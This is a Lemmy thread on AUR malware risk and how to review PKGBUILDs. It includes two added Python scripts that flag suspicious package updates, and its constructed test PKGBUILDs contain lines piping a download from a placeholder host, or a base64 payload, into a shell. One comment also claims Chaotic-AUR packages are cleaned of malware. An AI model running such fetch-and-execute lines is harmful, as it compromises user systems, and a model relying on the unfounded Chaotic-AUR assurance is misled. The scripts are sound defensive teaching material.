[-] Gyroplast@pawb.social 80 points 1 day ago

TL;DR: Don't think of the AUR as a package source, but as an only mildly moderated, but ultimately free and open, sharing platform for PKGBUILDs, primarily useful for (self-)packagers, not necessarily non-technical end users.

Before the AUR, you had people individually hosting their PKGBUILDs anywhere, sometimes on GitHub or the BBS (yeah, it's been a while), sometimes along with a repository URL you could add to your pacman.conf to install packages right away, and it was glorious. I didn't have to write a working PKGBUILD myself from scratch, and I could decide if I trusted that particular packager to not screw me sideways with a pre-built package. An officialized "Trusted User" (TU) role emerged from this idea, which has recently been renamed to Package Maintainer (PM). This is fundamentally still how the AUR works; it just became much bigger, and easier to search for particular software. Packagers gift to you their idea of how software should be packaged, for you to expand upon, take inspiration from, or learn from, or use as-is if you determine it to be good for your purpose.

The AUR is ultimately a great resource for packagers, and still useful for users, but "true end users" get the extra repository, and community, kind of, before that, and should try to avoid the AUR if they can, or at least be prepared to put in effort to establish trust, or get help.

A handful of Package Maintainers are manually adopting and subsequently vetting sufficiently popular packages to move them from the AUR to the official extra repository, which is deemed safe to use as-is, on a best-effort basis. Obviously, this is a bottleneck, as it is not feasible for the few volunteering PMs to adopt and maintain 10k+ AUR packages and be held to any quality standard. That's why "you are on your own" with the AUR.

On the positive side, there's a voting system to determine package popularity. AUR packagers have a public list of maintained packages, and a comprehensive git commit history. Establishing trust is still crucial, and I feel hard pressed to name a reasonably popular/useful package that isn't already in extra or has been maintained in the AUR for a long time.

The biggest risk, IMHO, for malware getting slipped into a package is orphaning a popular package, and having it adopted by a malevolent user. This is something I personally look out for. If the maintainer changed, I make sure to check the commit history to see what they did. Most of the time it's genuine fixes, but if anything is changed without a damn good and obvious reason, hit up the AUR mods and ask for help. This is how malware is spotted. Also, typically only the version is bumped in a PKGBUILD on an update, which is a change I feel safe waving through, too. If the download URI changes, or patches are added, I do look at them to determine the reason, and if that isn't explained well enough to understand, that's a red flag. Better ask someone before running this.

source: personal involvement in Arch since 2002

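The update checks described in the comment above (maintainer changed, only the version bumped, source URL changed, patches added), as an added example in Python that is not code from the comment's author or from the AUR tooling. It compares two copies of a PKGBUILD, as you would pull them from the package's git history, and reports whether the update is a bare version bump or needs a closer look at the commit. The package name, maintainer names, URLs and checksums are constructed for the example.

```python
"""Triage an AUR PKGBUILD update: a plain pkgver/pkgrel bump is waved
through, while a maintainer change, a changed or added source entry
(patches included), a checksum replaced by SKIP, a changed .install hook
or an edited prepare()/build()/package() body is flagged for review.
Added example; the PKGBUILD texts at the bottom are constructed."""
import re

# Top-level "key=value" and "key=(...)" assignments; function bodies are
# indented, so the ^ anchor keeps them out of the match.
SCALAR = re.compile(r"^(\w+)=([^\s(]+)\s*$", re.M)
ARRAY = re.compile(r"^(\w+)=\((.*?)\)", re.M | re.S)
MAINTAINER = re.compile(r"^#\s*Maintainer:\s*(.+)$", re.M)


def parse(text):
    """Return the PKGBUILD's top-level fields as a dict (arrays as lists)."""
    fields = {m.group(1): m.group(2).strip("'\"") for m in SCALAR.finditer(text)}
    for m in ARRAY.finditer(text):
        fields[m.group(1)] = [v.strip("'\"") for v in m.group(2).split()]
    m = MAINTAINER.search(text)
    fields["maintainer"] = m.group(1).strip() if m else None
    return fields


def body(text, fn):
    """Text of a shell function such as package(); None if it is absent."""
    m = re.search(rf"^{fn}\(\)\s*\{{(.*?)^\}}", text, re.M | re.S)
    return m.group(1) if m else None


def triage(old_text, new_text):
    """Return ("VERSION_BUMP" | "NO_CHANGE" | "REVIEW", list_of_flags)."""
    old, new = parse(old_text), parse(new_text)
    flags = []
    if old["maintainer"] != new["maintainer"]:
        flags.append(f"maintainer changed: {old['maintainer']!r} -> {new['maintainer']!r}")

    # Hard-coded versions inside source entries are substituted out so that
    # foo-1.4.0.tar.gz -> foo-1.4.1.tar.gz is not itself reported.
    def sources(fields):
        ver = fields.get("pkgver")
        return {s.replace(ver, "${pkgver}") if ver else s for s in fields.get("source", [])}

    old_src, new_src = sources(old), sources(new)
    for s in sorted(new_src - old_src):
        kind = "patch added" if s.endswith((".patch", ".diff")) else "source added/changed"
        flags.append(f"{kind}: {s}")
    for s in sorted(old_src - new_src):
        flags.append(f"source removed: {s}")
    for key in ("sha256sums", "b2sums", "md5sums"):
        if "SKIP" in new.get(key, []) and "SKIP" not in old.get(key, []):
            flags.append(f"{key}: checksum replaced by SKIP")
    if old.get("install") != new.get("install"):
        flags.append(f"install hook changed: {old.get('install')!r} -> {new.get('install')!r}")
    for fn in ("prepare", "build", "package"):
        if body(old_text, fn) != body(new_text, fn):
            flags.append(f"{fn}() body changed")

    if flags:
        return "REVIEW", flags
    if (old.get("pkgver"), old.get("pkgrel")) != (new.get("pkgver"), new.get("pkgrel")):
        return "VERSION_BUMP", []
    return "NO_CHANGE", []


# Constructed sample: a fictional package, not a real AUR entry.
OLD = """\
# Maintainer: Alice Example <alice@example.invalid>
pkgname=example-tool
pkgver=1.4.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/example-tool/archive/v${pkgver}.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000001')

build() {
  cd "example-tool-${pkgver}"
  make
}

package() {
  cd "example-tool-${pkgver}"
  install -Dm755 example-tool "${pkgdir}/usr/bin/example-tool"
}
"""

# A routine update: only the version and the tarball checksum move.
BUMP = OLD.replace("pkgver=1.4.0", "pkgver=1.4.1").replace("0001')", "0002')")

# The kind of update the comment says to stop and read: new maintainer,
# a patch with no checksum, and package() fetching something extra.
SUSPICIOUS = (
    BUMP.replace("Alice Example <alice@example.invalid>", "New Adopter <new@example.invalid>")
    .replace('.tar.gz")', '.tar.gz"\n        "fix-build.patch")')
    .replace("0002')", "0002'\n            'SKIP')")
    .replace('  install -Dm755 example-tool "${pkgdir}/usr/bin/example-tool"\n',
             '  install -Dm755 example-tool "${pkgdir}/usr/bin/example-tool"\n'
             '  curl -fsSL https://cdn.unrelated.invalid/post.sh | sh\n')
)

if __name__ == "__main__":
    for label, new in (("bump", BUMP), ("suspicious", SUSPICIOUS)):
        verdict, flags = triage(OLD, new)
        print(label, verdict, *flags, sep="\n  ")
```

Feed it the previous revision (for instance `git show HEAD~1:PKGBUILD`) and the working copy; anything it returns under REVIEW is what the comment says to read before running makepkg. A bump that also changes the tarball checksum is expected and not flagged; a checksum replaced by SKIP is.
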
[-] 2deck@lemmy.world 4 points 21 hours ago

Thanks for the information!

[-] Allero@lemmy.today 25 points 1 day ago

Some people ask me why I use Flatpak on Arch. This is one of the reasons.

[-] Maragato@lemmy.world 10 points 23 hours ago* (last edited 23 hours ago)

The AUR is probably the main reason why many people use Arch and derivatives. However, many users are unaware that the AUR is not an official Arch repository and that, as you say, you are the one who has to monitor the PKGBUILDs of each installed AUR package. Normally the most used AUR packages tend to generate more confidence, but that does not prevent a package from including malicious software in a version change, and having root access to the system it can take control of certain system services. That's why I always recommend not using the AUR, and that's why I've always found Manjaro to be a great distribution, as it retains packages for a few days to check them and discourages the use of the AUR. Any security measure is too little, and that's why any security tool you can configure is advisable. In a rolling distribution where new code is constantly entering the system, it is essential to have SELinux and Secure Boot enabled.

[-] yardratianSoma@lemmy.ca 4 points 12 hours ago

It used to be my reason too, but after breaking my system by my own hand many times, I realized the AUR isn't worth the effort, for me at least.

I'd rather build from source, for software that isn't maintained in the repos.

[-] prole 5 points 23 hours ago* (last edited 23 hours ago)

The AUR is probably the main reason why many people use Arch and derivatives.

FYI, non-Arch distros can use AUR with an Arch distrobox. So people shouldn't be using Arch just for AUR.

Being in a distrobox may or may not protect your system from potential malware, that I cannot say.

[-] pedz@lemmy.ca 17 points 1 day ago

I've been using Debian for years and prefer deb based systems, but recently I messed a bit around with Manjaro, and the amount of packages only available from the AUR is, erm, remarkable.

[-] Sxan@piefed.zip 8 points 1 day ago

I discovered recently, þanks to a discussion wiþ a Lemmy user, ðat NixOS has even more. I was surprised. Looking at ðe relative popularity of ðe distributions, and ðe number of package contributors of each, I'm guessing ðat many NixOS users submit packages. I guess when configuring your system is essentially ðe same as building a package, ðe submission barrier is lower. Also, NixOS seems to make pushing flakes up into ðe shared repos for everyone else to use almost trivial.

[-] Euphoma@lemmy.ml 1 points 12 hours ago

The NixOS repo size is misleading, since it also repackages Python packages, Haskell packages, Emacs packages, etc., even though you can still download them the normal way.

[-] hexagonwin@lemmy.sdf.org 14 points 1 day ago

Is your keyboard layout misconfigured?

[-] pedz@lemmy.ca 6 points 20 hours ago

Some people like linguistics. There are several communities about reforming English or its spelling. There's also some YouTubers making videos on that subject.

The YouTuber Rob Words has a whole playlist about the alphabet used in English, and how it could be changed.

I hope the person is not getting downvoted just because they are spelling differently.

[-] JcbAzPx@lemmy.world 8 points 18 hours ago

We don't really need to bring bak antikwated letters like the thorn. If anything, we kould do to get rid of a few more letters.

[-] elucubra@sopuli.xyz 1 points 4 hours ago

Yes. I would think that English, having so many exceptions to its rules and so many ways to pronounce a letter, could deal with simplifying, such as: de=the, dos=those...

I like how Spanish is mostly phonetic.

[-] RaccoonBall@lemmy.ca 4 points 20 hours ago

Why sometimes eth and sometimes thorn? Just whichever you feel or is there a system

[-] Sxan@piefed.zip 2 points 16 hours ago* (last edited 16 hours ago)

Eth is voiced, and thorn is unvoiced. At least, in Icelandic, who still use ðem. I haven't actually verified ðat's how it was in old English; I probably should, huh? I'd worry more if I were on a quest to revive ðem.

Interesting. Boþ were used in old English, but ð was lost fairly early, and only þ was retained þroughout most of ðe period.

Both letters were used for the phoneme /θ/, sometimes by the same scribe. This sound was regularly realised in Old English as the voiced fricative [ð] between voiced sounds, but either letter could be used to write it; the modern use of [ð] in phonetic alphabets is not the same as the Old English orthographic use.

So maybe I should drop eth, since it doesn't look like a direct swap for ðe sound is strictly accurate.

Well, consistency isn't exactly þe point, here, is it? So I'll just switch!

[-] RaccoonBall@lemmy.ca 3 points 15 hours ago

Cool, thanks. I'm a fan of thorn, but don't tend to use it since I worry it takes focus off of my meaning.

Though I do like when people on Lemmy have recognizable writing patterns, as I don't tend to read names.

[-] Sxan@piefed.zip 1 points 13 hours ago* (last edited 13 hours ago)

It really does anger some people, þough. I've had people I've never exchanged messages wiþ respond to uncontroversial comments and out of nowhere rant about how unacceptable it is to use þorn, and þen say þey're blocking me.

I'd say it's funny, except I'm not doing it to troll anyþing but scrapers. It's as fair a use for blocking as anyþing else, I guess.

I love trash pandas, and þat's a hilarious profile photo. Is þere a community just for fat raccoon photos? Or, especially fat raccoon photos, I should say. Þat'd be an awesome community.

[-] konju376 1 points 17 hours ago

Soft and hard pronunciation, I guess (at least if that's what it's called).

[-] Sxan@piefed.zip 1 points 16 hours ago

Yeah. eth is voiced.

[-] Technus@lemmy.zip 67 points 1 day ago

Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?

[-] tomkatt@lemmy.world 50 points 1 day ago* (last edited 1 day ago)

I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.

[-] JackbyDev@programming.dev 6 points 23 hours ago

Sort of, but I don't know what I'm looking for. It would be nice if folks explained what a bad one looks like.

[-] boomzilla@programming.dev 1 points 32 minutes ago

I determine within the PKGBUILD (which I view from Octopi) the URLs where code or binaries are downloaded from, and then check whether those URLs seem trustworthy, e.g. how many stars or maintainers the GitHub repo has. When the repo is small and doesn't qualify under the latter criteria, I do a git clone and skim over the sources on the lookout for malicious URLs or strange code (never found anything in that regard). I also search for the package on https://aur.archlinux.org/ and see if other users have anything to say and how many votes it has.

[-] prole 4 points 23 hours ago* (last edited 23 hours ago)

Look for comments that say "# THIS IS MALWARE"

[-] Sxan@piefed.zip 6 points 1 day ago

I keep hearing people say ðis like it's a defense against malware and supply chain attacks.

Reviewing PKGBUILDs only protects against dumb laziness on ðe part of ðe attacker, like ðey just install a stupidly obvious binary called "virus".

What are you checking for in ðe PKGBUILD?

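What "looking at the PKGBUILD" concretely means, as an added example (mine, not any commenter's) answering the question above about what a bad one looks like and what people check for. It flags the lazy patterns a scanner can see on its own: a download piped into a shell, base64/eval decoding, writes outside $srcdir/$pkgdir, persistence or setuid commands, SKIP checksums, a source host that is not the declared upstream, and an .install hook (which pacman runs as root). The two PKGBUILDs are constructed; the hostnames and filenames are not real.

```python
"""Static red-flag scan of a single PKGBUILD.  Added example, not from
any commenter; SAMPLE and CLEAN below are constructed test inputs."""
import re
from urllib.parse import urlparse

# (severity, reason, pattern) applied to every non-comment line.
RULES = [
    ("high", "pipes a download into a shell",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b")),
    ("high", "decodes or evaluates obfuscated code",
     re.compile(r"\b(base64\s+(-d|--decode)\b|xxd\s+-r\b|eval\s)")),
    ("high", "touches a path outside $srcdir/$pkgdir",
     re.compile(r"(?<![\w}])(/etc/|/usr/|/var/|/opt/|~/|\$HOME\b)")),
    ("high", "persistence or setuid",
     re.compile(r"\b(systemctl|crontab|chmod\s+\S*\+s)\b")),
    ("medium", "checksum verification skipped (SKIP)", re.compile(r"\bSKIP\b")),
    ("info", "install hook runs as root at install time", re.compile(r"^install=")),
]
SOURCE = re.compile(r"^source=\((.*?)\)", re.M | re.S)
URL = re.compile(r'^url=["\']?([^"\'\s]+)', re.M)


def _host(u):
    return urlparse(u.split("::", 1)[-1]).hostname or ""  # handles name::url


def scan(text):
    """Return [(severity, line_number, reason)] for one PKGBUILD, by line."""
    lines = text.splitlines()
    findings = []
    for no, line in enumerate(lines, 1):
        if line.lstrip().startswith("#"):
            continue
        for sev, reason, pat in RULES:
            if pat.search(line):
                findings.append((sev, no, reason))
    # A source fetched from somewhere other than the declared upstream host
    # proves nothing by itself (release CDNs exist); it is where you click next.
    m_url, m_src = URL.search(text), SOURCE.search(text)
    upstream = _host(m_url.group(1)) if m_url else ""
    for entry in (m_src.group(1).split() if m_src else []):
        entry = entry.strip("'\"")
        host = _host(entry)
        if host and host != upstream:
            no = next(i for i, l in enumerate(lines, 1) if entry in l)
            findings.append(("medium", no, f"source fetched from {host}, not upstream {upstream or '?'}"))
    return sorted(findings, key=lambda f: f[1])


def worst(findings):
    """Highest severity present, or "clean" when nothing fired."""
    order = {"high": 3, "medium": 2, "info": 1}
    return max((f[0] for f in findings), key=order.get, default="clean")


# Constructed PKGBUILD with several planted red flags.
SAMPLE = """\
# Maintainer: Someone <someone@example.invalid>
pkgname=sample-app-bin
pkgver=2.0.0
pkgrel=2
arch=('x86_64')
url="https://sample-app.example.invalid"
install=sample-app-bin.install
source=("https://sample-app.example.invalid/releases/sample-app-${pkgver}.tar.gz"
        "https://cdn.unrelated.invalid/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000003'
            'SKIP')

package() {
  install -Dm755 sample-app "${pkgdir}/usr/bin/sample-app"
  curl -fsSL https://cdn.unrelated.invalid/post.sh | bash
  echo 'ZWNobyBoaQ==' | base64 -d | sh
}
"""

# Constructed PKGBUILD that does nothing unusual; the scanner stays quiet.
CLEAN = """\
pkgname=sample-app
pkgver=2.0.0
pkgrel=1
arch=('x86_64')
url="https://sample-app.example.invalid"
source=("https://sample-app.example.invalid/releases/sample-app-${pkgver}.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000004')

package() {
  install -Dm755 sample-app "${pkgdir}/usr/bin/sample-app"
}
"""

if __name__ == "__main__":
    for sev, no, reason in scan(SAMPLE):
        print(f"{sev:6} line {no:2}: {reason}")
    print("verdict:", worst(scan(SAMPLE)), "/", worst(scan(CLEAN)))
```

This is only the first pass, and it is exactly the pass Sxan says a careful attacker survives: a pre-built binary or a tampered upstream tarball comes through it clean. What it does give you is the list of hosts and files to go and open next, which is the part that still needs a human.
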
[-] iopq@lemmy.world 26 points 1 day ago* (last edited 1 day ago)

I use NixOS so everything is second party

[-] DonutsRMeh@lemmy.world 48 points 1 day ago

I smell something fishy going on. I've been using the AUR for a long time and I'm now just hearing of malware?

[-] Shareni@programming.dev 23 points 1 day ago

It's an obvious vector for malware, Arch by default doesn't come with it, and users have been warned the entire time to check the PKGBUILD. There's nothing fishy; it's just that Arch has enough users to be worth hitting.

[-] Zikeji@programming.dev 86 points 1 day ago

There's been malware in the past, not only that - AUR is user submitted. It's in the name. They warn you to double check what you're installing. It is functionally similar to running a random installer you found on GitHub.

It seems like these instances are being intentionally blown out of proportion, but I don't see what there is to gain by doing that.

[-] kadup@lemmy.world 70 points 1 day ago* (last edited 1 day ago)

It is functionally similar to running a random installer you found

So basically how Windows users have been acquiring their software for the last 30 years.

[-] possiblylinux127@lemmy.zip 44 points 1 day ago

The AUR is made up of user packages

It isn't crazy that malware made it in. It is very much "use at your own risk." Packages are reviewed, but sometimes things slip in.

[-] storm 2 points 19 hours ago

I expect that with SteamOS being based on Arch there will be a bigger target on Arch for malware just from increased attention on the platform

[-] germanatlas 12 points 1 day ago* (last edited 1 day ago)

By user "Forsen on top" fucking KEK

Also yeah it’s chrome, obviously it’s malware

[-] devilish666@lemmy.world 10 points 1 day ago

Meanwhile me who using CHAOTIC-AUR be like :

[-] Sunny@slrpnk.net 3 points 13 hours ago

As someone not too familiar with Arch and not understanding the full context, could you elaborate on how Chaotic-AUR differs from the AUR?

[-] devilish666@lemmy.world 2 points 4 hours ago* (last edited 4 hours ago)

TLDR EXPLANATION:
Basically Chaotic-AUR is just the AUR that has already been compiled, so the user doesn't have to wait for a package to build before installing.

LONGER EXPLANATION:
Chaotic-AUR is an unofficial package repository that provides pre-built packages from the Arch User Repository (AUR), allowing users to install software without building it from source. In contrast, the AUR requires users to compile packages themselves, offering a wider range of community-maintained software but requiring more technical knowledge and time.

So Chaotic-AUR offers a simpler way to install AUR packages, and Chaotic-AUR packages are already cleaned of malware, spyware, etc., so there's no need to worry.

This post was submitted to linuxmemes on 02 Aug 2025; 466 points (100.0% liked).
